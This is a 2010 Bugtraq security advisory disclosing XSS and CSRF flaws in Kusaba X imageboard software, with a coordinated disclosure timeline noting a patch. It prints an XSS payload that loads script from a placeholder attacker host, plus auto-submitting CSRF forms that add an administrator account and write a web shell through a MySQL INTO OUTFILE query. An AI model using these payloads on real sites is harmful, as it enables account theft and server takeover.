[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Kusaba X <= 0.9 XSS/CSRF vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Kusaba X <= 0.9 XSS/CSRF vulnerabilities
From: systemx00@xxxxxxxxx
Date: 17 Feb 2010 22:48:14 -0000

==========================================
Kusaba X <= 0.9 XSS/CSRF vulnerabilities
==========================================

Kusaba X suffers XSS and CSRF vulnerabilities that would allow an attacker to 
take over the web application and possibly the entire server (depending on the 
MySQL configuration).  The XSS vulnerability is not required to exploit the 
CSRF but makes the proccess very easy.


XSS:
==========================================
The ?Reason? field in the report function doesn't sanitize user input.  The 
input size is limited to 256 characters, (pleanty for exploitation, but not 
enough for a textwall of CSRF forms).  This can be circumvented by including 
off-site javascripts, i.e. <script src="http://attacker.com/asdf.js";></script>. 
 (iframes work too)  The injected script will render and execute when a 
Moderator or Administrator views the reports.  If a Moderator falls victim, the 
worst case scenario would be cookie stealing followed by session hijacking and 
account theft.  If an Administrator were to view the malicious report, much 
more is possible.  It would be easy to detect the difference and act 
accordingly, making this attack more effective.
==========================================

CSRF:
==========================================
These run rampent throughout the application.  Here are two of the most severe 
but there's lots of fun to be had.

1. Add administrative accouts?

<form action="http://example.chan/manage_page.php?action=staff&add"; 
method="POST">
<input name="username" value="user123" />
<input name="password" value="pass123" />
<input name="type" value="1" />
</form>
<script>document.forms[0].submit();</script>

2. Execute MySQL queries?

<form action="http://example.chan/manage_page.php?action=sql"; method="POST">
<input name="query" value="SELECT 'your-shell-here' INTO OUTFILE 
'/path/to/www';" />
</form>
<script>document.forms[0].submit();</script>
===========================================

Feb 9, 2010 - Reported to Kusaba X dev team.
Feb 15, 2010 - Kusaba X 0.9.1 released containing patch.
Feb 17, 2010 - Info released

~~Thanks to Sazpaimon
~~Greetz to the open source community

Prev by Date: [USN-896-1] Firefox 3.5 and Xulrunner 1.9.1 vulnerabilities
Next by Date: SphereCMS Blind SQL Injection Vulnerability
Previous by thread: [USN-896-1] Firefox 3.5 and Xulrunner 1.9.1 vulnerabilities
Next by thread: SphereCMS Blind SQL Injection Vulnerability
Index(es):
- Date
- Thread